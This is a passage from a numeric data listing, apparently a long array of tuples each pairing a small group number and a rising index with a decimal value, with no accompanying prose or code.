(257, 278123, 0.95669),
(242, 278124, 1.07331),
(242, 278125, 1.72662),
(242, 278126, 1.82),
(242, 278127, 1.00331),
(242, 278128, 1.09669),
(242, 278129, 1.07331),
(242, 278130, 1.16669),
(242, 278131, 1.14331),
(242, 278132, 1.05),
(242, 278133, 0.98),
(242, 278134, 1.09669),
(242, 278135, 0.42),
(242, 278136, 1.09669),
(242, 278137, 1.23669),
(242, 278138, 2.87007),
(242, 278139, 1.00331),
(242, 278140, 1.02669),
(242, 278141, 1.05),
(242, 278142, 1.19),
(242, 279156, 0.95669),
(242, 279157, 1.09669),
(242, 279158, 0.88669),
(242, 279159, 0.95669),
(242, 279160, 0.88669),
(242, 279161, 1.07331),
(242, 279162, 1.82),
(242, 279163, 2.00662),
(242, 279164, 0.98),
(242, 279165, 1.07331),
(242, 279166, 0.91),
(242, 279167, 1.05),
(242, 279168, 1.05),
(242, 279169, 1.16669),
(242, 279170, 1.09669),
(242, 279171, 0.14),
(252, 279171, 0.14),
(242, 279172, 1.07331),
(242, 279173, 1.16669),
(306, 279174, 0.18669),
(242, 279174, 0.37338),
(306, 279175, 0.86331),
(242, 279175, 1.72662),
(242, 279176, 1.05),
(242, 279177, 1.12),
(242, 279178, 0.86331),
(242, 279179, 1.00331),
(242, 279180, 0.95669),
(242, 279181, 1.09669),
(242, 279182, 0.88669),
(242, 279183, 1.02669),
(242, 279184, 0.37331),
(242, 279185, 1.07331),
(242, 279186, 1.12),
(242, 279187, 1.02669),
(242, 279188, 0.98),
(242, 279189, 1.00331),
(242, 279190, 1.09669),
(242, 279191, 0.98),
(242, 279192, 0.86331),
(242, 279193, 0.95669),
(242, 279194, 0.86331),
(242, 279195, 1.05),
(242, 279196, 1.02669),
(242, 279197, 1.00331),
(242, 279198, 0.98),
(242, 279199, 0.98),
(242, 279200, 1.05),
(242, 279201, 0.91),
(242, 279202, 0.98),
(242, 279203, 0.93331),
(242, 279204, 1.00331),
(242, 279205, 1.07331),
(242, 279206, 0.93331),
(242, 279207, 1.00331),
(242, 279208, 1.07331),
(242, 279209, 1.16669),
(242, 279210, 1.02669),
(242, 279211, 1.09669),
(242, 279212, 1.02669),
(254, 279212, 1.02669),
(242, 279213, 1.02669),
(242, 279214, 1.82),
(242, 279215, 0.98),
(242, 279216, 1.05),
(242, 279217, 0.95669),
(242, 279218, 1.07331),
(242, 279219, 0.93331),
(242, 279220, 1.07331),
(242, 279221, 0.98),
(242, 279222, 1.02669),
(242, 279223, 1.02669),
(242, 279224, 1.00331),
(252, 279224, 1.00331),
(306, 279224, 2.00662),
(242, 279225, 1.02669),
(242, 279226, 1.19),
(242, 279227, 1.07331),
(242, 279228, 1.00331),
(255, 279228, 1.00331),
(242, 279229, 1.00331),
(242, 279230, 1.12),
(242, 279231, 0.93331),
(242, 279232, 1.02669),
(242, 279233, 1.02669),
(242, 279234, 1.09669),
(242, 279235, 0.88669),
(242, 279236, 0.95669),
(304, 279237, 0.93331),
(242, 279237, 2.79993),
(242, 279238, 2.00662),
(242, 279239, 1.05),
(242, 279240, 0.95669),
(242, 279241, 0.98),
(242, 279242, 1.02669),
(242, 279243, 1.05),
(288, 279243, 1.05),
(242, 279244, 1.07331),
(242, 279245, 1.02669),
(242, 279246, 1.00331),
(242, 279247, 1.21331),
(242, 279248, 0.95669),
(242, 279249, 1.05),
(242, 279250, 1.05),
(242, 279251, 0.88669),
(242, 279252, 0.98),
(242, 279253, 0.91),
(242, 279254, 1.05),
(242, 279255, 1.96),
(242, 279256, 1.26),
(242, 279257, 1.26),
(242, 279258, 0.91),
(242, 279259, 1.14331),
(242, 279260, 0.93331),
(242, 279261, 1.09669),
(242, 279262, 1.00331),
(242, 279263, 1.07331),
(242, 279264, 0.88669),
(242, 279265, 1.02669),
(242, 279266, 1.86662),
(242, 279267, 1.19),
(242, 279268, 1.02669),
(242, 279269, 1.07331),
(242, 279270, 0.95669),
(242, 279271, 1.02669),
(242, 279272, 1.19),
(242, 279273, 0.98),
(242, 279274, 0.91),
(242, 279275, 1.02669),
(242, 279276, 1.00331),
(242, 279277, 1.23669),
(242, 279278, 1.00331),
(242, 279279, 0.88669),
(242, 279280, 0.95669),
(242, 279281, 1.28331),
(242, 279282, 1.14331),
(242, 279283, 0.88669),
(242, 279284, 0.95669),
(242, 279285, 1.00331),
(254, 279285, 1.00331),
(242, 279286, 1.07331),
(242, 279287, 1.16669),
(242, 279288, 0.91),
(242, 279289, 0.98),
(242, 279290, 0.86331),
(242, 279291, 1.16669),
(242, 279292, 0.91),
(242, 279293, 1.07331),
(242, 279294, 1.05),
(242, 279295, 0.98),
(242, 279296, 1.05),
(242, 279297, 1.02669),
(242, 279298, 1.02669),
(242, 279299, 0.98),
(242, 279300, 1.05),
(242, 279301, 1.12),
(242, 279302, 0.86331),
(242, 279303, 0.98),
(242, 279304, 1.02669),
(242, 279305, 1.12),
(242, 279306, 1.02669),
(242, 279307, 0.95669),
(242, 279308, 1.05),
(242, 279309, 0.98),
(242, 279310, 1.07331),
(242, 279311, 0.88669),
(242, 279312, 1.00331),
(242, 279313, 1.05),
(242, 279314, 1.14331),
(242, 279315, 1.00331),
(242, 279316, 1.07331),
(242, 279317, 1.19),
(242, 279318, 1.09669),
(242, 279319, 1.14331),
(242, 279320, 0.91),
(242, 279321, 1.00331),
(242, 279322, 1.82),
(242, 279323, 1.96),
(242, 279324, 0.93331),
(242, 279325, 1.12),
(242, 279326, 1.14331),
(242, 279327, 0.98),
(242, 279328, 1.05),
(242, 279329, 0.32669),
(242, 279330, 1.07331),
(242, 279331, 1.16669),
(242, 279332, 1.12),
(242, 279333, 1.14331),
(242, 279334, 0.95669),
(242, 279335, 1.05),
(242, 279336, 1.02669),
(242, 279337, 0.91),
(242, 279338, 1.07331),
(242, 279339, 0.93331),
(242, 279340, 1.02669),
(242, 279341, 1.02669),
(242, 279342, 1.07331),
(242, 279343, 0.91),
(242, 279344, 0.98),
(242, 279345, 1.96),
(242, 279346, 2.1),
(242, 279347, 0.88669),
(242, 279348, 1.05),
(242, 279349, 1.86662),
(242, 279350, 2.05338),
(242, 279351, 0.93331),
(242, 279352, 1.09669),
(242, 279353, 1.07331),
(242, 279354, 0.98),
(242, 279355, 1.05),
(242, 279356, 1.14331),
(242, 279357, 1.00331),
(242, 279358, 1.21331),
(242, 279359, 1.11993),
(242, 279360, 2.00662),
(242, 279361, 1.09669),
(242, 279362, 1.09669),
(242, 279363, 0.98),
(242, 279364, 1.12),
(242, 279365, 0.91),
(256, 279365, 0.91),
(242, 279366, 0.95669),
(255, 279366, 0.95669),
(242, 279367, 0.93331),
(288, 279367, 0.93331),
(242, 279368, 1.00331),
(242, 279369, 0.88669),
(242, 279370, 1.00331),
(242, 279371, 1.02669),
(242, 279372, 1.19),
(242, 279373, 1.91338),
(242, 279374, 1.07331),
(242, 279375, 1.16669),
(242, 279376, 1.02669),
(242, 279377, 1.09669),
(242, 279378, 0.93331),
(242, 279379, 1.00331),
(242, 279380, 1.05),
(242, 279381, 1.07331),
(242, 279382, 1.12),
(242, 279383, 0.95669),
(242, 279384, 1.07331),
(242, 279385, 1.16669),
(242, 279386, 1.26),
(242, 279387, 1.09669),
(242, 279388, 1.16669),
(242, 279389, 1.05),
(242, 279390, 0.60669),
(242, 279391, 1.14331),
(242, 279392, 1.23669),
(242, 279393, 1.00331),
(242, 279394, 1.09669),
(242, 279395, 1.05),
(242, 279396, 0.23331),
(242, 279397, 0.88669),
(242, 279398, 1.16669),
(242, 279399, 0.95669),
(242, 279400, 1.14331),
(242, 279401, 0.91),
(242, 279402, 1.05),
(242, 279403, 0.91),
(242, 279404, 1.00331),
(242, 279405, 1.96),
(242, 279406, 0.95669),
(242, 279407, 0.84),
(242, 279408, 0.95669),
(242, 279409, 0.91),
(242, 279410, 1.07331),
(242, 279411, 0.95669),
(242, 279412, 0.93331),
(299, 279412, 0.93331),
(242, 279413, 1.02669),
(242, 279414, 0.91),
(242, 279415, 0.98),
(242, 279416, 0.93331),
(254, 279416, 0.93331),
(242, 279417, 1.05),
(242, 279418, 0.86331),
(242, 279419, 1.00331),
(242, 279420, 1.00331),
(242, 279421, 1.19),
(242, 279422, 0.91),
(242, 279423, 1.07331),
(242, 279424, 0.93331),
(242, 279425, 1.05),
(242, 279426, 0.93331),
(242, 279427, 0.93331),
(242, 279428, 1.02669),
(242, 279429, 0.88669),
(242, 279430, 0.95669),
(242, 279431, 0.95669),
(242, 279432, 0.93331),
(242, 279433, 1.02669),
(242, 279434, 1.86662),
(242, 279435, 0.95669),
(242, 279436, 0.93331),
(242, 279437, 1.02669),
(242, 279438, 0.95669),
(242, 279439, 1.00331),
(242, 279440, 1.09669),
(242, 279441, 0.95669),
(306, 279442, 1.72662),
(242, 279442, 2.58993),
(242, 279443, 0.93331),
(242, 279444, 1.05),
(242, 279445, 1.00331),
(242, 279446, 0.86331),
(242, 279447, 0.95669),
(242, 279448, 0.86331),
(242, 279449, 0.95669),
(242, 279450, 0.84),
(242, 279451, 0.95669),
(242, 279452, 0.95669),
(292, 279452, 0.95669),
(242, 279453, 1.02669),
(242, 279454, 1.00331),
(242, 279455, 0.98),
(242, 279456, 0.95669),
(242, 279457, 0.95669),
(242, 279458, 0.86331),
(242, 279459, 0.98),
(242, 279460, 0.98),
(242, 279461, 1.05),
(242, 279462, 0.93331),
(256, 279462, 0.93331),
(242, 279463, 5.32014),
(242, 279464, 0.98),
(242, 279465, 1.05),
(242, 279466, 0.95669),
(242, 279467, 1.00331),
(242, 279468, 0.95669),
(242, 279469, 1.12),
(242, 279470, 0.95669),
(242, 279471, 0.88669),
(242, 279472, 0.98),
(242, 279473, 0.84),
(242, 279474, 0.95669),
(242, 279475, 0.91),
(242, 279476, 0.98),
(242, 279477, 0.98),
(242, 279478, 0.98),
(242, 279479, 1.12),
(242, 279480, 0.86331),
(242, 279481, 0.95669),
(242, 279482, 1.00331),
(242, 279483, 1.05),
(242, 279484, 0.37331),
(242, 279485, 0.95669),
(242, 279486, 1.05),
(242, 279487, 0.98),
(242, 279488, 1.09669),
(242, 279489, 1.14331),
(242, 279490, 0.28),
(255, 279490, 0.28),
(242, 279491, 0.91),
(255, 279491, 0.91),
(242, 279492, 1.02669),
(242, 279493, 1.12),
(243, 281699, 0.86331),
(243, 281700, 0.95669),
(243, 281701, 0.91),
(243, 281702, 0.84),
(243, 281703, 0.95669),
(243, 281704, 0.84),
(243, 281705, 0.95669),
(243, 281706, 0.86331),
(243, 281707, 0.95669),
(243, 281708, 0.84),
(243, 281709, 0.95669),
(243, 281710, 0.21),
(243, 281711, 0.91),
(243, 281712, 1.00331),
(243, 281722, 0.91),
(243, 281723, 1.00331),
(243, 281949, 1.00331),
(243, 281950, 1.05),
(243, 281951, 0.91),
(243, 281952, 1.00331),
(243, 281953, 1.02669),
(243, 281954, 1.12),
(243, 281955, 0.84),
(243, 281956, 0.93331),
(243, 281957, 0.93331),
(243, 281958, 1.00331),
(243, 281959, 0.98),
(243, 281960, 1.23669),
(243, 281961, 0.32669),
(243, 281962, 1.00331),
(243, 281963, 1.19),
(243, 282494, 7.02981),
(243, 282495, 8.16981),
(243, 282496, 1.16669),
(243, 282497, 1.00331),
(243, 282498, 0.28),
(243, 282499, 0.93331),
(243, 282500, 1.14331),
(243, 282501, 0.37331),
(243, 282502, 1.00331),
(243, 282503, 1.12),
(243, 282504, 0.93331),
(243, 282505, 1.09669),
(243, 282506, 0.91),
(243, 282507, 1.00331),
(243, 282508, 0.46669),
(243, 282509, 1.05),
(243, 282510, 1.21331),
(243, 282511, 8.73981),
(243, 282512, 0.93331),
(304, 282512, 0.93331),
(243, 282513, 1.05),
(243, 282514, 1.02669),
(243, 282515, 1.96),
(243, 282516, 1.16669),
(243, 282517, 1.05),
(243, 282518, 1.12),
(243, 282519, 1.07331),
(243, 282520, 2.05338),
(243, 282521, 2.19338),
(243, 282522, 1.00331),
(243, 282523, 1.02669),
(243, 282524, 1.00331),
(243, 282525, 1.07331),
(243, 282526, 1.05),
(243, 282527, 1.12),
(243, 282528, 1.77338),
(243, 282529, 1.09669),
(243, 282530, 0.95669),
(243, 282531, 0.95669),
(243, 282532, 1.09669),
(243, 282533, 1.02669),
(243, 282534, 1.05),
(243, 282535, 1.19),
(243, 282536, 0.88669),
(243, 282537, 0.95669),
(243, 282538, 0.98),
(243, 282539, 1.23669),
(243, 282540, 1.07331),
(243, 282541, 7.98),
(243, 282542, 8.93019),
(243, 282543, 1.00331),
(243, 282544, 1.07331),
(243, 282545, 1.00331),
(243, 282546, 1.00331),
(243, 282547, 0.98),
(243, 282548, 1.05),
(243, 282549, 1.16669),
(243, 282550, 0.93331),
(243, 282551, 1.05),
(243, 282552, 0.93331),
(243, 282553, 1.14331),
(243, 282554, 0.95669),
(243, 282555, 1.09669),
(243, 282556, 1.05),
(243, 282557, 1.14331),
(243, 282558, 1.00331),
(243, 282559, 1.07331),
(243, 282560, 0.88669),
(243, 282561, 1.00331),
(243, 282562, 0.95669),
(243, 282563, 1.07331),
(243, 282564, 1.05),
(243, 282565, 1.09669),
(243, 282566, 1.12),
(243, 282567, 1.23669),
(243, 282568, 1.07331),
(243, 282569, 1.19),
(243, 282570, 0.91),
(243, 282571, 1.05),
(243, 282572, 1.05),
(243, 282573, 1.14331),
(243, 282574, 1.09669),
(243, 282575, 1.00331),
(243, 282576, 1.72662),
(243, 282577, 1.91338),
(243, 282578, 0.88669),
(243, 282579, 1.09669),
(243, 282580, 1.00331),
(243, 282581, 1.07331),
(243, 282582, 2.00662),
(243, 282583, 1.07331),
(243, 282584, 0.91),
(243, 282585, 1.00331),
(243, 282586, 1.82),
(243, 282587, 0.98),
(243, 282588, 1.00331),
(243, 282589, 1.00331),
(243, 282590, 1.07331),
(243, 282591, 1.07331),
(243, 282592, 1.05),
(243, 282593, 1.05),
(243, 282594, 1.91338),
(243, 282595, 1.05),
(243, 282596, 1.02669),
(243, 282597, 1.09669),
(243, 282598, 0.98),
(243, 282599, 1.05),
(292, 282599, 1.05),
(243, 282600, 0.95669),
(243, 282601, 1.12),
(243, 282602, 1.00331),
(243, 282603, 1.12),
(243, 282604, 1.02669),
(243, 282605, 0.91),
(243, 282606, 0.98),
(243, 282607, 0.93331),
(243, 282608, 1.00331),
(243, 282609, 0.81669),
(243, 282610, 1.00331),
(243, 282611, 0.95669),
(243, 282612, 1.07331),
(243, 282613, 1.00331),
(243, 282614, 1.09669),
(243, 282615, 0.84),
(243, 282616, 1.00331),
(243, 282617, 1.02669),
(243, 282618, 1.07331),
(243, 282619, 0.91),
(243, 282620, 0.95669),
(243, 282621, 0.98),
(243, 282622, 0.91),
(243, 282623, 1.00331),
(243, 282624, 0.95669),
(243, 282625, 1.07331),
(243, 282626, 0.86331),
(292, 282626, 0.86331),
(243, 282627, 1.02669),
(243, 282628, 0.98),
(243, 282629, 1.05),
(243, 282630, 0.98),
(243, 282631, 1.00331),
(243, 282632, 1.05),
(243, 282633, 0.93331),
(243, 282634, 1.00331),
(243, 282635, 0.98),
(243, 282636, 0.42),
(243, 282637, 1.00331),
(243, 282638, 1.12),
(243, 282639, 0.46669),
(243, 282640, 1.07331),
(243, 282641, 1.14331),
(243, 282642, 1.19),
(243, 282643, 1.26),
(243, 282644, 1.05),
(243, 282645, 1.14331),
(243, 282646, 0.95669),
(243, 282647, 1.02669),
(243, 282648, 0.91),
(243, 282649, 0.98),
(243, 282650, 0.28),
(243, 282651, 1.02669),
(243, 282652, 1.23669),
(244, 283746, 0.88669),
(244, 283880, 1.07331),
(244, 283881, 0.86331),
(244, 283882, 0.95669),
(244, 283883, 0.84),
(244, 283884, 0.95669),
(244, 283885, 0.88669),
(244, 283886, 0.98),
(244, 283887, 0.98),
(244, 283888, 0.93331),
(244, 283889, 1.07331),
(244, 283890, 0.28),
(244, 283891, 0.91),
(244, 283892, 1.07331),
(244, 284327, 1.02669),
(244, 284328, 0.88669),
(292, 284328, 0.88669),
(244, 284329, 1.05),
(244, 284330, 0.91),
(244, 284331, 0.95669),
(244, 284332, 1.02669),
(244, 284333, 1.12),
(244, 284334, 1.05),
(244, 284335, 1.09669),
(244, 284336, 1.00331),
(244, 284337, 0.91),
(244, 284338, 1.02669),
(244, 284339, 0.98),
(244, 284340, 1.12),
(244, 284341, 0.98),
(244, 284342, 1.21331),
(244, 284343, 1.05),
(244, 284344, 1.12),
(244, 284345, 0.98),
(244, 284346, 1.14331),
(244, 284347, 1.00331),
(244, 284348, 0.93331),
(244, 284349, 1.00331),
(244, 284350, 0.95669),
(244, 284351, 1.00331),
(244, 284352, 1.05),
(244, 284353, 1.16669),
(244, 284354, 0.93331),
(244, 284355, 1.05),
(244, 284356, 0.98),
(244, 284357, 1.05),
(244, 284358, 0.91),
(244, 284359, 1.05),
(244, 284360, 1.00331),
(244, 284361, 1.05),
(244, 284362, 1.00331),
(244, 284363, 1.00331),
(244, 284364, 1.07331),
(244, 284365, 1.96),
(244, 284366, 1.07331),
(244, 284367, 1.09669),
(244, 284368, 1.07331),
(244, 284369, 1.14331),
(244, 284370, 1.86662),
(244, 284371, 1.05),
(244, 284372, 1.02669),
(244, 284373, 1.00331),
(244, 284374, 1.05),
(244, 284375, 0.98),
(244, 284376, 1.07331),
(244, 284377, 1.00331),
(244, 284378, 0.98),
(244, 284379, 1.05),
(244, 284380, 1.09669),
(244, 284381, 1.16669),
(244, 284382, 1.96),
(244, 284383, 2.14662),
(244, 284384, 1.09669),
(244, 284385, 1.12),
(244, 284386, 1.09669),
(244, 284387, 1.16669),
(244, 284388, 0.88669),
(244, 284389, 1.02669),
(244, 284390, 1.16669),
(244, 284391, 0.88669),
(292, 284391, 0.88669),
(244, 284392, 0.98),
(244, 284393, 0.98),
(287, 284394, 0.91),
(244, 284394, 1.82),
(244, 284395, 0.98),
(287, 284395, 0.98),
(244, 284396, 1.00331),
(244, 284397, 0.91),
(244, 284398, 1.07331),
(244, 284399, 0.93331),
(244, 284400, 1.02669),
(244, 284401, 1.00331),
(244, 284402, 1.00331),
(244, 284403, 0.98),
(244, 284404, 0.95669),
(244, 284405, 0.93331),
(244, 284406, 1.00331),
(244, 284407, 0.91),
(244, 284408, 1.02669),
(244, 284409, 0.95669),
(244, 284410, 1.00331),
(244, 284411, 0.88669),
(306, 284411, 0.88669),
(244, 284412, 0.98),
(244, 284413, 0.88669),
(244, 284414, 1.00331),
(244, 284415, 0.98),
(244, 284416, 1.12),
(244, 284417, 0.95669),
(244, 284418, 1.12),
(244, 284419, 0.23331),
(306, 284419, 0.23331),
(244, 284420, 0.91),
(244, 284421, 1.05),
(244, 284422, 0.23331),
(244, 284423, 0.93331),
(244, 284424, 1.05),
(244, 284425, 0.91),
(244, 284426, 1.05),
(244, 284427, 0.32669),
(244, 284428, 0.98),
(244, 284429, 1.12),
(245, 284744, 2.8666),
(245, 284745, 3.1334),
(245, 284842, 0.32669),
(245, 284843, 0.95669),
(245, 284844, 1.02669),
(245, 284845, 1.02669),
(245, 284846, 1.23669),
(245, 284847, 0.42),
(245, 284848, 1.00331),
(245, 284849, 1.09669),
(245, 284850, 0.88669),
(245, 284851, 1.07331),
(245, 284852, 0.18669),
(245, 284853, 0.98),
(245, 284854, 1.09669),
(245, 285082, 0.91),
(245, 285083, 0.98),
(245, 285084, 0.18669),
(245, 285085, 0.91),
(245, 285086, 1.16669),
(245, 285087, 0.91),
(245, 285088, 1.09669),
(245, 285089, 0.95669),
(245, 285090, 1.09669),
(245, 285091, 0.88669),
(245, 285092, 1.05),
(245, 285093, 0.95669),
(245, 285094, 1.00331),
(245, 285095, 0.98),
(245, 285096, 1.16669),
(245, 285097, 1.02669),
(245, 285098, 1.09669),
(245, 285099, 1.00331),
(245, 285100, 1.00331),
(245, 285101, 1.00331),
(245, 285102, 1.00331),
(245, 285103, 1.02669),
(245, 285104, 1.07331),
(245, 285105, 0.91),
(245, 285106, 1.05),
(245, 285107, 0.93331),
(245, 285108, 1.00331),
(245, 285109, 1.05),
(245, 285110, 0.93331),
(245, 285111, 1.05),
(245, 285112, 0.95669),
(245, 285113, 1.02669),
(245, 285114, 0.98),
(245, 285115, 1.07331),
(245, 285116, 0.95669),
(245, 285117, 1.02669),
(245, 285118, 0.88669),
(245, 285119, 1.02669),
(245, 285120, 0.84),
(306, 285120, 0.84),
(245, 285121, 0.95669),
(245, 285122, 1.00331),
(245, 285123, 1.09669),
(245, 285124, 0.98),
(245, 285125, 0.98),
(245, 285126, 0.93331),
(245, 285127, 1.02669),
(245, 285128, 0.98),
(245, 285129, 1.21331),
(246, 285312, 0.77),
(246, 285313, 0.93331),
(246, 285314, 0.77),
(246, 285315, 0.84),
(246, 285316, 0.77),
(246, 285317, 0.88669),
(246, 285318, 0.81669),
(246, 285319, 0.91),
(246, 285320, 2.4),
(246, 285321, 3.0666),
(246, 285322, 0.88669),
(246, 285323, 1.02669),
(246, 285324, 0.86331),
(246, 285325, 0.95669),
(246, 285326, 0.98),
(246, 285327, 0.91),
(246, 285328, 0.91),
(246, 285329, 1.16669),
(246, 285330, 0.84),
(246, 285331, 0.91),
(246, 285332, 0.81669),
(246, 285333, 1.00331),
(246, 285334, 0.35),
(246, 285335, 0.91),
(246, 285336, 1.00331),
(246, 285469, 0.84),
(246, 285470, 0.93331),
(246, 285471, 0.88669),
(246, 285472, 0.98),
(246, 285473, 0.81669),
(246, 285474, 0.93331),
(246, 285475, 0.98),
(246, 285476, 1.14331),
(246, 285477, 1.35331),
(246, 285478, 0.88669),
(246, 285479, 1.00331),
(246, 285480, 1.12),
(246, 285481, 1.30669),
(246, 285482, 0.28),
(288, 285482, 0.28),
(292, 285482, 0.28),
(304, 285482, 0.28),
(306, 285482, 0.28),
(246, 285483, 0.91),
(246, 285484, 0.98),
(246, 285485, 1.02669),
(246, 285486, 1.12),
(246, 285818, 0.95669),
(246, 285819, 1.02669),
(246, 285820, 0.84),
(246, 285821, 1.12),
(246, 285822, 1.19),
(246, 285823, 1.00331),
(246, 285824, 0.95669),
(292, 285824, 0.95669),
(246, 285825, 1.09669),
(246, 285826, 1.00331),
(246, 285827, 0.95669),
(246, 285828, 1.02669),
(246, 285829, 0.93331),
(246, 285830, 1.00331),
(246, 285831, 0.93331),
(246, 285832, 1.00331),
(246, 285833, 1.02669),
(246, 285834, 1.12),
(246, 285835, 9.69),
(246, 285836, 0.98),
(246, 285837, 0.91),
(246, 285838, 1.05),
(246, 285839, 0.93331),
(306, 285839, 0.93331),
(246, 285840, 1.05),
(246, 285841, 0.95669),
(246, 285842, 1.00331),
(246, 285843, 1.05),
(246, 285844, 1.23669),
(246, 285845, 0.88669),
(246, 285846, 0.98),
(246, 285847, 0.98),
(246, 285848, 1.07331),
(246, 285849, 1.02669),
(246, 285850, 1.09669),
(246, 285851, 1.09669),
(246, 285852, 0.98),
(246, 285853, 1.05),
(246, 285854, 0.91),
(246, 285855, 0.98),
(246, 285856, 0.98),
(246, 285857, 1.07331),
(246, 285858, 0.88669),
(246, 285859, 0.98),
(246, 285860, 1.12),
(246, 285861, 1.02669),
(246, 285862, 0.93331),
(246, 285863, 0.95669),
(246, 285864, 0.95669),
(246, 285865, 1.86662),
(246, 285866, 1.02669),
(246, 285867, 1.09669),
(246, 285868, 0.95669),
(246, 285869, 1.72662),
(246, 285870, 1.07331),
(246, 285871, 1.00331),
(246, 285872, 0.88669),
(246, 285873, 1.02669),
(246, 285874, 0.95669),
(246, 285875, 1.02669),
(246, 285876, 0.95669),
(246, 285877, 0.93331),
(246, 285878, 1.16669),
(246, 285879, 0.37331),
(246, 285880, 0.95669),
(246, 285881, 1.07331),
(246, 285882, 0.42),
(246, 285883, 1.09669),
(246, 285884, 1.21331),
(246, 285885, 0.93331),
(246, 285886, 1.00331),
(246, 285887, 0.91),
(246, 285888, 1.00331),
(247, 286365, 0.79331),
(247, 286366, 0.93331),
(247, 286367, 0.93331),
(247, 286368, 1.00331),
(247, 286369, 0.84),
(247, 286370, 0.91),
(247, 286371, 0.86331),
(247, 286372, 0.93331),
(247, 286373, 2.9334),
(247, 286374, 3.2),
(247, 286382, 0.84),
(247, 286383, 1.00331),
(247, 286384, 0.86331),
(247, 286385, 0.98),
(247, 286386, 0.86331),
(247, 286387, 1.00331),
(247, 286388, 0.79331),
(247, 286389, 0.93331),
(247, 286390, 0.81669),
(247, 286391, 0.98),
(247, 286392, 0.14),
(290, 286392, 0.74),
(247, 286393, 0.88669),
(247, 286394, 1.02669),
(247, 286507, 1.14331),
(247, 286508, 1.28331),
(247, 286509, 1.02669),
(247, 286510, 1.09669),
(247, 286511, 0.91),
(247, 286512, 1.05),
(247, 286513, 1.00331),
(247, 286514, 1.09669),
(247, 286515, 1.23669),
(247, 286516, 0.42),
(304, 286516, 0.42),
(305, 286516, 0.42),
(247, 286517, 1.09669),
(247, 286518, 1.19),
(247, 286519, 0.98),
(247, 286520, 1.07331),
(247, 286521, 0.88669),
(247, 286522, 0.98),
(247, 286722, 0.86331),
(247, 286723, 0.98),
(247, 286724, 1.05),
(247, 286725, 1.14331),
(247, 286726, 0.95669),
(247, 286727, 1.05),
(247, 286728, 4.66655),
(247, 286729, 1.14331),
(247, 286730, 1.16669),
(247, 286731, 1.14331),
(247, 286732, 1.14331),
(247, 286733, 1.23669),
(247, 286734, 0.86331),
(247, 286735, 1.02669),
(247, 286736, 1.00331),
(247, 286737, 1.05),
(247, 286738, 0.88669),
(247, 286739, 0.95669),
(247, 286740, 9.81312),
(247, 286741, 1.19),
(247, 286742, 0.95669),
(247, 286743, 1.09669),
(247, 286744, 0.95669),
(247, 286745, 1.02669),
(247, 286746, 0.98),
(247, 286747, 0.95669),
(247, 286748, 1.12),
(247, 286749, 0.98),
(247, 286750, 1.02669),
(247, 286751, 0.88669),
(304, 286751, 0.88669),
(305, 286751, 0.88669),
(247, 286752, 0.95669),
(247, 286753, 1.02669),
(247, 286754, 0.86331),
(247, 286755, 1.00331),
(247, 286756, 1.02669),
(247, 286757, 0.93331),
(247, 286758, 1.05),
(247, 286759, 0.91),
(247, 286760, 1.09669),
(247, 286761, 0.98),
(247, 286762, 1.23669),
(247, 286763, 0.98),
(247, 286764, 1.26),
(247, 286765, 0.86331),
(247, 286766, 1.07331),
(247, 286767, 0.93331),
(247, 286768, 1.14331),
(247, 286769, 0.91),
(306, 286769, 0.91),
(247, 286770, 1.00331),
(247, 286771, 1.00331),
(247, 286772, 1.05),
(247, 286773, 0.98),
(247, 286774, 0.88669),
(247, 286775, 0.98),
(247, 286776, 1.07331),
(247, 286777, 0.95669),
(247, 286778, 0.88669),
(247, 286779, 1.09669),
(247, 286780, 0.91),
(247, 286781, 1.12),
(247, 286782, 0.56),
(247, 286783, 1.07331),
(247, 286784, 1.30669),
(248, 287325, 0.93331),
(248, 287326, 1.07331),
(248, 287327, 0.93331),
(248, 287328, 1.14331),
(248, 287331, 0.88669),
(248, 287332, 0.93331),
(248, 287429, 0.88669),
(248, 287430, 1.00331),
(248, 287431, 1.00331),
(248, 287432, 1.07331),
(248, 287433, 0.23331),
(248, 287434, 0.91),
(248, 287435, 1.02669),
(248, 287436, 0.91),
(248, 287437, 1.00331),
(248, 287438, 1.00331),
(248, 287439, 1.14331),
(248, 287440, 1.05),
(248, 287441, 1.12),
(248, 287442, 1.14331),
(248, 287443, 0.98),
(248, 287444, 3.78643),
(248, 287445, 8.74688),
(248, 287446, 1.12),
(248, 287447, 9.30981),
(248, 287448, 1.00331),
(248, 287449, 1.07331),
(248, 287450, 0.98),
(248, 287451, 1.05),
(248, 287706, 1.72662),
(248, 287707, 1.91338),
(248, 287708, 0.98),
(248, 287709, 1.14331),
(248, 287710, 1.02669),
(248, 287711, 1.09669),
(248, 287712, 0.86331),
(248, 287713, 0.95669),
(248, 287714, 1.00331),
(248, 287715, 1.09669),
(248, 287716, 0.95669),
(305, 287716, 0.95669),
(248, 287717, 0.88669),
(248, 287718, 1.14331),
(248, 287719, 1.02669),
(248, 287720, 1.09669),
(248, 287721, 0.93331),
(305, 287721, 0.93331),
(248, 287722, 1.14331),
(248, 287723, 1.07331),
(248, 287724, 0.93331),
(248, 287725, 1.00331),
(248, 287726, 1.00331),
(248, 287727, 0.98),
(248, 287728, 1.09669),
(248, 287729, 1.02669),
(248, 287730, 1.00331),
(248, 287731, 0.98),
(290, 287731, 1.96),
(248, 287732, 1.09669),
(248, 287733, 0.91),
(248, 287734, 1.07331),
(248, 287735, 1.05),
(248, 287736, 1.07331),
(248, 287737, 1.16669),
(248, 287738, 1.02669),
(248, 287739, 1.30669),
(248, 287740, 1.16669),
(248, 287741, 0.95669),
(248, 287742, 1.07331),
(248, 287743, 0.86331),
(248, 287744, 0.93331),
(248, 287745, 1.12),
(248, 287746, 1.19),
(248, 287747, 0.95669),
(248, 287748, 1.02669),
(248, 287749, 1.12),
(248, 287750, 0.95669),
(248, 287751, 1.09669),
(248, 287752, 0.93331),
(248, 287753, 1.12),
(248, 287754, 1.07331),
(248, 287755, 0.88669),
(248, 287756, 0.98),
(248, 287757, 0.86331),
(248, 287758, 0.93331),
(248, 287759, 0.91),
(248, 287760, 0.95669),
(248, 287761, 1.07331),
(248, 287762, 0.88669),
(248, 287763, 0.98),
(248, 287764, 1.12),
(248, 287765, 1.09669),
(248, 287766, 0.93331),
(248, 287767, 1.07331),
(248, 287768, 0.88669),
(248, 287769, 0.95669),
(249, 288352, 2.04),
(249, 288353, 2.38),
(249, 288354, 0.86331),
(249, 288355, 1.05),
(249, 288360, 0.86331),
(249, 288361, 0.28),
(249, 288362, 0.93331),
(249, 288363, 1.00331),
(249, 288475, 0.86331),
(249, 288476, 1.02669),
(249, 288477, 0.98),
(249, 288478, 1.05),
(249, 288479, 0.86331),
(249, 288480, 1.00331),
(249, 288481, 0.37331),
